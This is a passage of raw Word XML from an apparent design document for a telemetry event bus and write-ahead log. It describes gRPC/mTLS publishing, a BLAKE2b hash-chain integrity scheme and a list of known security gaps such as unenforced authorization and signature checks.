      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA23B86" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="2DD25893" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 2 — EVENTBUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799CD185" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Transport Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101EDE85" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mTLS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (TLS 1.2+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B49E5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dual service: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (legacy Envelope) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UniversalEventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UniversalEnvelope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625E84CC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Publish RPCs: Publish(Envelope), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PublishTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UniversalEnvelope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PublishBatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TelemetryBatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F195F33" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Management RPCs: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegisterDevice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetHealth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetMetrics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B66003D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Back-pressure: MAX_ENV_BYTES=128KB, BUS_MAX_INFLIGHT, overload check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432426C3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dedup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: Application-level via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idempotency_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (_seen cache, 50K entries, TTL-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEFD164" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Failure modes: RETRY (transient), INVALID (permanent), OK (success/duplicate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7740DF43" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC209CD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Publish Handler Sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEA5B6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agent → Create Envelope → Sign (Ed25519) → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Publish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827FF58" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Server: 1. Inc inflight → 2. Overload check → 3. Size check (128KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BD712" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">→ 4. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Signature</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> verify → 5. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dedup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> check → 6. Inflight limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F68A01" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">→ 7. WAL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>write_raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() → 8. Dec inflight → 9. Return ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B19389B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419D6FE5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Envelope Field Ownership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30"/>
        <w:gridCol w:w="1827"/>
        <w:gridCol w:w="3201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="7ED344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4FDA7916" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Field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0B64131E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Controller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193E1C60" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="33FCD1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9F2E4E1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">version, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>idempotency_key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64342A9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Agent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D612CB5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Set by publishing agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="750E6B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4EBD901" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>flow/process/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>device_telemetry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6F0BE92" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Agent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CCBE49F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Payload, one-of</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="681B6B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5476861" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>sig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F7C38B6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Agent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B989867" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Ed25519 signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="341AF9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EFEB7E4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prev_sig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CE1A330" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WAL System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73E1791" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Set during </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>write_raw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6A3C7C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9D63BF2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>schema_version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AC66B68" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Agent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9137356" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Forward </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>compat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> marker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="7B6769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D733903" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">priority, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processing_hints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85EE9F4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Agent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C420285" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Routing hints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="494FF45D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5E6DED" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Critical Gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ABE448" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G1: Authorization NOT enforced (_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>peer_cn_from_context</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> defined but never called)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D616710" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G2: Signature verification code exists but NOT called in Publish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBBA08A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">G3: No replay protection (same idem key from different agents = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dedup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> collision)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A8BCD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G4: No per-agent rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A1FDC1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t>G5: Metrics endpoint (port 9090) unprotected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7190BD7C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C23F39" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="2F004D3E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 3 — WAL LAYER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A00DB4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 WAL Write Sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A857C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>write_raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(idem, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts_ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>env_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1FD0BE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  1. checksum = BLAKE2b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>env_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97FC09" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  2. Lock (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>threading.RLock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ACDE94" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prev_sig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = last row's sig OR GENESIS_SIG (32 zero bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E3B09A" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  4. sig = BLAKE2b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>env_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prev_sig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FADFCF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  5. INSERT INTO </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(idem, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts_ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, bytes, checksum, sig, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prev_sig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A68D633" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  6. Auto-commit (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isolation_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=None)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE3FBD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  7. Release lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69100E00" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F5F5C3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hash Chain Formula: sig[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] = BLAKE2b(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>envelope_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">] || sig[i-1]), where sig[0] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prev_sig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = GENESIS = 0x00*32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1F290" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7423450B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 WAL Read/Verify Sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081CA2D2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_batch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>batch_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=100):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F1473" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  1. SELECT rows from WAL (ORDER BY id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE06886" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  2. For each: verify BLAKE2b checksum (quarantine if mismatch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16DA56" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  3. For each: verify hash chain sig (quarantine if chain break)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC2E040" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  4. Parse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → route to domain processor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821A3E9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  5. Enrich with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ASN/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatIntel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (A4.4 wiring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D99DF04" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  6. Insert into domain tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D46DC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  7. DELETE processed rows from WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F645EC9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1894F7F9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quarantine: Failed entries go to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wal_dead_letter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>error_msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, original bytes, timestamp.</w:t>
      </w:r>
    </w:p>
